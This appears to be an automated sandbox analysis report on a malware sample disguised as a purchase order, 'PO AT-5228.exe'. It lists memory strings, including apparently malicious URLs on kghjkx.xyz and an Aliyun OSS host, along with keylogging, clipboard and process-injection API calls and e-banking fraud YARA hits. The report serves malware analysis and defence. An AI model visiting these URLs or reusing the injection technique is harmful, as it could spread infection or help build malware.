                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281832298961.jpg
                Source: BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111312107302.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111319395468.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111325300285.jpg
                Source: BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111427368389.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111513122916.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111535192258.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111538232952.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111658373793.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111752281448.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111820293498.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111832440129.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121017068870.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121022389060.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121103162503.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121111152889.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121124551331.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121130140569.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121401562198.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121445018007.jpg
                Source: AtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.marketplacer.top&rand=
                Source: AtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
                Source: AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: AtBroker.exe, 00000003.00000002.3526286582.0000000005DB6000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.00000000044E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.kghjkx.xyz/usop/?rP=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJxsPo
                Source: AtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_land
                Source: AtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_lan
                Source: AtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_land_h
                Source: AtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
                Source: AtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.marketplacer.top&amp;reg_source=parking_auto
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BB6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00BB6B0C
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BB6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00BB6D07
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BB6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00BB6B0C
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BA2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00BA2B37
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BCF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00BCF7FF

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.440000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.440000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3527019353.0000000005710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1781295730.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3524540674.0000000000790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3525547305.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1781112261.0000000000440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1781559228.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3525581336.0000000005270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3524288505.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: This is a third-party compiled AutoIt script.0_2_00B63D19
                Source: PO AT-5228.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: PO AT-5228.exe, 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b01fa7d8-4
                Source: PO AT-5228.exe, 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3f373521-2
                Source: PO AT-5228.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e1caf27d-9
                Source: PO AT-5228.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_c37cb31f-0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0046C9E3 NtClose,1_2_0046C9E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72B60 NtClose,LdrInitializeThunk,1_2_02E72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_02E72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E735C0 NtCreateMutant,LdrInitializeThunk,1_2_02E735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E74340 NtSetContextThread,1_2_02E74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E74650 NtSuspendThread,1_2_02E74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72AF0 NtWriteFile,1_2_02E72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72AD0 NtReadFile,1_2_02E72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72AB0 NtWaitForSingleObject,1_2_02E72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72BE0 NtQueryValueKey,1_2_02E72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72BF0 NtAllocateVirtualMemory,1_2_02E72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72BA0 NtEnumerateValueKey,1_2_02E72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72B80 NtQueryInformationFile,1_2_02E72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72EE0 NtQueueApcThread,1_2_02E72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72EA0 NtAdjustPrivilegesToken,1_2_02E72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72E80 NtReadVirtualMemory,1_2_02E72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72E30 NtWriteVirtualMemory,1_2_02E72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72FE0 NtCreateFile,1_2_02E72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72FA0 NtQuerySection,1_2_02E72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72FB0 NtResumeThread,1_2_02E72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72F90 NtProtectVirtualMemory,1_2_02E72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72F60 NtCreateProcessEx,1_2_02E72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72F30 NtCreateSection,1_2_02E72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72CF0 NtOpenProcess,1_2_02E72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72CC0 NtQueryVirtualMemory,1_2_02E72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72CA0 NtQueryInformationToken,1_2_02E72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72C60 NtCreateKey,1_2_02E72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72C70 NtFreeVirtualMemory,1_2_02E72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72C00 NtQueryInformationProcess,1_2_02E72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72DD0 NtDelayExecution,1_2_02E72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72DB0 NtEnumerateKey,1_2_02E72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72D30 NtUnmapViewOfSection,1_2_02E72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72D00 NtSetInformationFile,1_2_02E72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72D10 NtMapViewOfSection,1_2_02E72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E73090 NtSetValueKey,1_2_02E73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E73010 NtOpenDirectoryObject,1_2_02E73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E739B0 NtGetContextThread,1_2_02E739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E73D70 NtOpenThread,1_2_02E73D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E73D10 NtOpenProcessToken,1_2_02E73D10
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F4650 NtSuspendThread,LdrInitializeThunk,3_2_045F4650
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F4340 NtSetContextThread,LdrInitializeThunk,3_2_045F4340
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_045F2C70
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2C60 NtCreateKey,LdrInitializeThunk,3_2_045F2C60
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_045F2CA0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_045F2D10
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_045F2D30
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2DD0 NtDelayExecution,LdrInitializeThunk,3_2_045F2DD0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_045F2DF0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2EE0 NtQueueApcThread,LdrInitializeThunk,3_2_045F2EE0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_045F2E80
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2F30 NtCreateSection,LdrInitializeThunk,3_2_045F2F30
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2FE0 NtCreateFile,LdrInitializeThunk,3_2_045F2FE0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2FB0 NtResumeThread,LdrInitializeThunk,3_2_045F2FB0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2AD0 NtReadFile,LdrInitializeThunk,3_2_045F2AD0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2AF0 NtWriteFile,LdrInitializeThunk,3_2_045F2AF0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2B60 NtClose,LdrInitializeThunk,3_2_045F2B60
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_045F2BF0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2BE0 NtQueryValueKey,LdrInitializeThunk,3_2_045F2BE0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_045F2BA0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F35C0 NtCreateMutant,LdrInitializeThunk,3_2_045F35C0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F39B0 NtGetContextThread,LdrInitializeThunk,3_2_045F39B0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2C00 NtQueryInformationProcess,3_2_045F2C00
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2CC0 NtQueryVirtualMemory,3_2_045F2CC0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2CF0 NtOpenProcess,3_2_045F2CF0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2D00 NtSetInformationFile,3_2_045F2D00
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2DB0 NtEnumerateKey,3_2_045F2DB0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2E30 NtWriteVirtualMemory,3_2_045F2E30
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2EA0 NtAdjustPrivilegesToken,3_2_045F2EA0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2F60 NtCreateProcessEx,3_2_045F2F60
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2F90 NtProtectVirtualMemory,3_2_045F2F90
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2FA0 NtQuerySection,3_2_045F2FA0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2AB0 NtWaitForSingleObject,3_2_045F2AB0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F2B80 NtQueryInformationFile,3_2_045F2B80
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F3010 NtOpenDirectoryObject,3_2_045F3010
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F3090 NtSetValueKey,3_2_045F3090
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F3D70 NtOpenThread,3_2_045F3D70
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F3D10 NtOpenProcessToken,3_2_045F3D10
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_00509350 NtCreateFile,3_2_00509350
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_005094C0 NtReadFile,3_2_005094C0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_005095B0 NtDeleteFile,3_2_005095B0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_00509650 NtClose,3_2_00509650
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_005097B0 NtAllocateVirtualMemory,3_2_005097B0
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BA6685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00BA6685
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B9ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00B9ACC5
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BA79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00BA79D3
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B8B0430_2_00B8B043
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B732000_2_00B73200
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B73B700_2_00B73B70
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B9410F0_2_00B9410F
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B802A40_2_00B802A4
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B6E3B00_2_00B6E3B0
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B9038E0_2_00B9038E
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B806D90_2_00B806D9
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B9467F0_2_00B9467F
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BCAACE0_2_00BCAACE
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B94BEF0_2_00B94BEF
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B8CCC10_2_00B8CCC1
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B66F070_2_00B66F07
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B6AF500_2_00B6AF50
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BC31BC0_2_00BC31BC
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B8D1B90_2_00B8D1B9
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B7B11F0_2_00B7B11F
